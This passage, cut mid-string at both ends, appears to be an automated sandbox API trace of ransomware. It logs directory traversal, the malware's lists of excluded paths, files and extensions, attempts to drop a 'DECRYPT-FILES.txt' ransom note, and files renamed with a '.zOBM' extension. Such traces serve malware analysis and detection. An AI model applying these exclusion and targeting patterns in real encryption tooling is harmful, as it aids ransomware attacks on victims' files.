HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0180.528] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.528] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0180.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\0a16c9.tmp" [0180.528] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.528] CloseHandle (hObject=0x0) returned 0 [0180.528] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.529] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0180.529] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0180.529] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0180.529] lstrcatW (in: lpString1="1033", lpString2="\\" | out: lpString1="1033\\") returned="1033\\" [0180.529] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Program Files") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch=":\\Windows") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Games\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\All Users") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="AhnLab") returned 0x0 [0180.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.529] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0180.529] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.529] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\0a16c9.tmp") returned 97 [0180.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.530] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0180.530] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.531] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\DECRYPT-FILES.txt") returned 104 [0180.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.531] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0180.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0180.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeb993c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb993c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.531] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeb993c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb993c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.531] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.531] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.531] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeb993c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeb993c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb993c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.531] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.531] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.531] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.531] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.531] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.531] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.531] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0180.531] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.532] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0180.532] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\0a16c9.tmp" [0180.532] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.532] CloseHandle (hObject=0x0) returned 0 [0180.532] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.533] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0180.533] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0180.533] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0180.533] lstrcatW (in: lpString1="14", lpString2="\\" | out: lpString1="14\\") returned="14\\" [0180.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Program Files") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch=":\\Windows") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Games\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\All Users") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="AhnLab") returned 0x0 [0180.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.533] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0180.533] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.533] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\0a16c9.tmp") returned 100 [0180.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.536] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0180.536] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.536] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\DECRYPT-FILES.txt") returned 107 [0180.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0180.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*" [0180.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.537] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.537] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.537] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.537] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeebbf520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.537] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.537] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.537] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.537] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.537] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.538] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.538] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0180.538] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.538] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" [0180.538] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\0a16c9.tmp" [0180.538] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.538] CloseHandle (hObject=0x0) returned 0 [0180.538] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.538] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaa8cf0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3fe5b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx.zOBM", cAlternateFileName="BUILT-~1.ZOB")) returned 1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="DECRYPT-FILES.txt") returned -1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="autorun.inf") returned 1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="boot.ini") returned 1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="desktop.ini") returned -1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="ntuser.dat") returned -1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="iconcache.db") returned -1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="bootsect.bak") returned 1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="ntuser.dat.log") returned -1 [0180.538] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="thumbs.db") returned -1 [0180.539] lstrcmpiW (lpString1="Built-In Building Blocks.dotx.zOBM", lpString2="Bootfont.bin") returned 1 [0180.539] lstrlenW (lpString="Built-In Building Blocks.dotx.zOBM") returned 34 [0180.539] lstrcmpiW (lpString1="zOBM", lpString2="lnk") returned 1 [0180.539] lstrcmpiW (lpString1="zOBM", lpString2="exe") returned 1 [0180.539] lstrcmpiW (lpString1="zOBM", lpString2="sys") returned 1 [0180.539] lstrcmpiW (lpString1="zOBM", lpString2="dll") returned 1 [0180.539] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0180.539] lstrlenW (lpString="Built-In Building Blocks.dotx.zOBM") returned 34 [0180.539] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" [0180.539] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpString2="Built-In Building Blocks.dotx.zOBM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.zOBM") returned="C:\\Users\\5p5NrGJn0jS 